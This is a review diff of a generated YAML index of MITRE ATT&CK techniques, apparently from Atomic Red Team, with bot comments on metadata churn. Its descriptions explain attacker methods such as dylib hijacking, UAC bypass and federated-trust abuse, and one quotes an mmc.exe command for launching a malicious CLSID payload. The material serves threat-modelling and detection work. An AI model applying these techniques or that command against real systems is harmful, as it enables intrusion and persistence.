url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-12-14T23:14:26.107Z'
name: Network Device Authentication
description: |-
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -14577,12 +14854,10 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.004:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:39.601Z'
name: Dylib Hijacking
description: |-
Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath
, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB
function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
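Review bot: T1556.004 loses both `spec_version` and `x_mitre_attack_spec_version: 2.1.0` here, so it ends up with no spec-version field at all, whereas T1480.001, T1216 and T1127 in this same patch keep `x_mitre_attack_spec_version: 2.1.0`. Any code that reads `x_mitre_attack_spec_version` must now tolerate the key being absent; otherwise the generator should emit a default for objects the new source does not stamp.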
@@ -14666,7 +14941,6 @@ defense-evasion:
url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1601.002:
technique:
@@ -14688,7 +14962,7 @@ defense-evasion:
url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
IOS devices. Retrieved October 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T17:49:02.660Z'
name: Downgrade System Image
description: "Adversaries may install an older version of the operating system
of a network device to weaken security. Older operating system versions on
@@ -14722,12 +14996,10 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -14779,9 +15051,8 @@ defense-evasion:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests: []
T1211:
@@ -14850,7 +15121,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1127:
technique:
@@ -14897,7 +15167,7 @@ defense-evasion:
legitimate certificates that allow them to execute on a system and proxy execution
of malicious code through a trusted process that effectively bypasses application
control solutions.'
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:00:37.443Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Trusted Developer Utilities Proxy Execution
x_mitre_detection: |-
@@ -14910,12 +15180,13 @@ defense-evasion:
x_mitre_is_subtechnique: false
x_mitre_data_sources:
- 'Command: Command Execution'
+ - 'Module: Module Load'
+ - 'Process: Process Metadata'
- 'Process: Process Creation'
x_mitre_defense_bypassed:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1127
atomic_tests: []
T1218.014:
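Review bot: T1127 gains two data sources (`Module: Module Load`, `Process: Process Metadata`) while its `x_mitre_attack_spec_version` stays 2.1.0 and, in the preceding hunk, its `modified` stamp moves from `2022-05-24` back to `2022-05-05`. Content changing under an earlier timestamp means the two sources differ in more than stamping; confirm that the new data-source list is what the intended upstream release carries before merging.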
@@ -14994,7 +15265,7 @@ defense-evasion:
mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious
CLSID payload with the following command: mmc.exe -Embedding C:\\path\\to\\test.msc
.(Citation:
abusing_com_reg)"
- modified: '2022-10-25T14:00:00.188Z'
+ modified: '2022-05-20T17:41:16.112Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: MMC
x_mitre_detection: "Monitor processes and command-line parameters for suspicious
@@ -15016,7 +15287,6 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564.010:
technique:
@@ -15059,7 +15329,7 @@ defense-evasion:
url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-11-29T15:56:50.370Z'
name: Process Argument Spoofing
description: |-
Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.(Citation: Microsoft PEB 2021)(Citation: Xpn Argue Like Cobalt 2019)
@@ -15083,8 +15353,6 @@ defense-evasion:
- 'Process: Process Creation'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.012:
technique:
@@ -15132,7 +15400,7 @@ defense-evasion:
url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
Profilers. Retrieved June 24, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T21:35:12.049Z'
name: 'Hijack Execution Flow: COR_PROFILER'
description: |-
Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -15170,8 +15438,6 @@ defense-evasion:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1574.012
atomic_tests: []
privilege-escalation:
@@ -15220,7 +15486,7 @@ privilege-escalation:
description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
16, 2017.
source_name: Microsoft SendNotifyMessage function
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.004Z'
name: 'Process Injection: Extra Window Memory Injection'
description: "Adversaries may inject malicious code into process via Extra Window
Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -15272,29 +15538,28 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.011
atomic_tests: []
T1053.005:
technique:
- modified: '2023-11-15T14:33:53.354Z'
+ modified: '2024-10-13T16:13:47.770Z'
name: 'Scheduled Task/Job: Scheduled Task'
description: "Adversaries may abuse the Windows Task Scheduler to perform task
scheduling for initial or recurring execution of malicious code. There are
multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
utility can be run directly on the command line, or the Task Scheduler can
be opened through the GUI within the Administrator Tools section of the Control
- Panel. In some cases, adversaries have used a .NET wrapper for the Windows
- Task Scheduler, and alternatively, adversaries have used the Windows netapi32
- library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
- utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
- though at.exe
can not access tasks created with schtasks
- or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
- programs at system startup or on a scheduled basis for persistence. The Windows
- Task Scheduler can also be abused to conduct remote Execution as part of Lateral
- Movement and/or to run a process under the context of a specified account
- (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+ Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+ wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+ used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+ (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+ Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+ create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+ Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+ system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+ can also be abused to conduct remote Execution as part of Lateral Movement
+ and/or to run a process under the context of a specified account (such as
+ SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
adversaries have also abused the Windows Task Scheduler to potentially mask
one-time execution under signed/trusted system processes.(Citation: ProofPoint
Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
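Review bot: the T1053.005 description drops the paragraph on the deprecated `at` utility (including its link to T1053.002) and adds a citation to this repository's own T1053.005.md under the key `Red Canary - Atomic Red Team`. Both are plausible upstream edits, and the `x_mitre_version` bump to 1.6 in the following hunk supports that, but because the new citation points back at Atomic Red Team's own documentation, confirm this text is the upstream description and not a locally edited one, so the next regeneration does not revert it.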
@@ -15341,7 +15606,7 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
@@ -15373,8 +15638,8 @@ privilege-escalation:
url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Tarrask scheduled task
description: Microsoft Threat Intelligence Team & Detection and Response Team
. (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -15388,6 +15653,10 @@ privilege-escalation:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Red Canary - Atomic Red Team
+ description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+ Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+ url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
@@ -15400,11 +15669,14 @@ privilege-escalation:
description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
Task - Registry. Retrieved June 1, 2022.
url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+ - source_name: Stack Overflow
+ description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+ Tasks folder. Retrieved June 19, 2024.
+ url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.005
atomic_tests: []
T1037:
@@ -15470,7 +15742,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.007:
technique:
@@ -15559,7 +15830,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.013:
technique:
@@ -15647,7 +15917,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.013
atomic_tests: []
T1543:
@@ -15732,7 +16001,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.006:
technique:
@@ -15764,7 +16032,7 @@ privilege-escalation:
Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:08:21.101Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: LC_LOAD_DYLIB Addition
x_mitre_detection: Monitor processes for those that may be used to modify binary
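Review bot: `modified` for T1546.006 moves backward, from 2022-05-11 to 2022-04-20, and the same happens to T1548.002, T1548.003, T1547.014, T1055.003, T1546.011, T1037.002, T1055, T1547.005 and T1543.004 further down. Every removed value shares the `T14:00:00.188Z` suffix, which looks like a bulk re-stamp from a bundle conversion rather than a content edit, so the new values are probably the faithful ones. Still, check a couple of them against the current upstream bundle before merging, because a generator pointed at an older snapshot would produce exactly this pattern of regressing timestamps.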
@@ -15787,11 +16055,10 @@ privilege-escalation:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053.007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:26:03.731Z'
name: Kubernetes Cronjob
description: |-
Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -15849,14 +16116,13 @@ privilege-escalation:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.007
atomic_tests: []
T1548.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:35:39.112Z'
name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
description: |-
Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -15957,7 +16223,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.002
atomic_tests: []
T1548.003:
@@ -15988,7 +16253,7 @@ privilege-escalation:
description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
Does. Retrieved March 19, 2018.
source_name: cybereason osx proton
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-14T16:28:19.781Z'
name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
description: |-
Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -16022,13 +16287,11 @@ privilege-escalation:
- User
x_mitre_effective_permissions:
- root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1548.003
atomic_tests: []
T1574.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:42:48.016Z'
name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
description: |-
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
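Review bot: T1548.003 loses `x_mitre_attack_spec_version: 2.1.0` along with `spec_version` and gets no replacement, whereas T1574.011 in the hunks that follow has the same key removed and then re-emitted as `3.2.0` near the end of the object. T1055.003, T1546.011 and T1547.005 later in the diff follow the T1548.003 pattern. Confirm the source objects for those four techniques genuinely carry no `x_mitre_attack_spec_version` (older, untouched objects in the STIX 2.0 bundle omit it) rather than the generator dropping the key, since anything that reads that field now sees a mix of 2.1.0, 3.1.0, 3.2.0 and missing.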
@@ -16047,7 +16310,6 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Matthew Demaske, Adaptforward
@@ -16061,7 +16323,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -16088,8 +16349,8 @@ privilege-escalation:
external_id: T1574.011
- source_name: Tweet Registry Perms Weakness
description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
- April 9, 2018."
- url: https://twitter.com/r0wdy_/status/936365549553991680
+ September 12, 2024."
+ url: https://x.com/r0wdy_/status/936365549553991680
- source_name: insecure_reg_perms
description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -16120,12 +16381,13 @@ privilege-escalation:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.011
atomic_tests: []
T1547:
technique:
- modified: '2024-04-16T12:26:07.945Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: Boot or Logon Autostart Execution
description: |-
Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
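Review bot: The `x_mitre_attack_spec_version: 3.2.0` and `x_mitre_modified_by_ref` lines added here for T1574.011 are the same two keys removed in the two preceding hunks; the net change to the object is a key reorder plus the 2.1.0 to 3.2.0 bump. Most of the churn in this file (the T1053.003 block further down is the largest case) has the same shape. Emitting the YAML with sorted keys, or in the upstream object's key order, would reduce regenerated indexes to their real content changes and make diffs like this one reviewable.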
@@ -16197,9 +16459,9 @@ privilege-escalation:
2017.
url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Microsoft TimeProvider
description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -16215,12 +16477,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547
atomic_tests: []
T1547.014:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-22T14:17:17.353Z'
name: Active Setup
description: |-
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -16295,12 +16556,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.014
atomic_tests: []
T1484.002:
technique:
- modified: '2024-04-19T04:27:51.388Z'
+ modified: '2024-09-25T13:50:11.593Z'
name: Domain Trust Modification
description: "Adversaries may add new domain trusts, modify the properties of
existing domain trusts, or otherwise change the configuration of trust relationships
@@ -16320,9 +16580,14 @@ privilege-escalation:
trust modifications such as altering the claim issuance rules to log in any
valid set of credentials as a specified user.(Citation: AADInternals zure
AD Federated Domain) \n\nAn adversary may also add a new federated identity
- provider to an identity tenant such as Okta, which may enable the adversary
- to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
- 2023)"
+ provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+ may enable the adversary to authenticate as any user of the tenant.(Citation:
+ Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+ gain broad access into a variety of cloud-based services that leverage the
+ identity tenant. For example, in AWS environments, an adversary that creates
+ a new identity provider for an AWS Organization will be able to federate into
+ all of the AWS Organization member accounts without creating identities for
+ each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
@@ -16342,9 +16607,8 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '2.0'
+ - Identity Provider
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
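Review bot: For T1484.002 the platform list drops `Azure AD` and `SaaS` and gains `Identity Provider`, following the ATT&CK v16 platform consolidation; T1098.003 further down gets the same treatment, with `Office 365`, `Google Workspace` and `Azure AD` collapsing into `Office Suite` and `Identity Provider`. If the per-platform index files are generated from this list, check that the generator knows the new platform names; otherwise both techniques silently vanish from the platform views that used to list them under Azure AD, and the `2.0` to `2.1` version bump gives no hint that it happened.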
@@ -16361,6 +16625,10 @@ privilege-escalation:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1484/002
external_id: T1484.002
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
- source_name: CISA SolarWinds Cloud Detection
description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -16394,7 +16662,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.002
atomic_tests:
- name: Add Federation to Azure AD
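Review bot: The T1484.002 description now names AWS IAM Identity Center and federating into every member account of an AWS Organization, yet the only atomic test under it is still `Add Federation to Azure AD`. Not a blocker for a regenerated index, but it is an obvious coverage gap worth a follow-up issue: an AWS counterpart that adds an external identity provider would exercise exactly the path the new text describes.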
@@ -16646,31 +16913,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.003
atomic_tests: []
T1053.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
- type: attack-pattern
- created: '2019-12-03T14:25:00.538Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1053.003
- url: https://attack.mitre.org/techniques/T1053/003
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T18:45:51.945Z'
name: 'Scheduled Task/Job: Cron'
description: "Adversaries may abuse the cron
utility to perform
task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -16687,6 +16934,7 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -16697,9 +16945,13 @@ privilege-escalation:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -16707,13 +16959,29 @@ privilege-escalation:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+ created: '2019-12-03T14:25:00.538Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1053/003
+ external_id: T1053.003
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1053.003
atomic_tests: []
T1098.003:
technique:
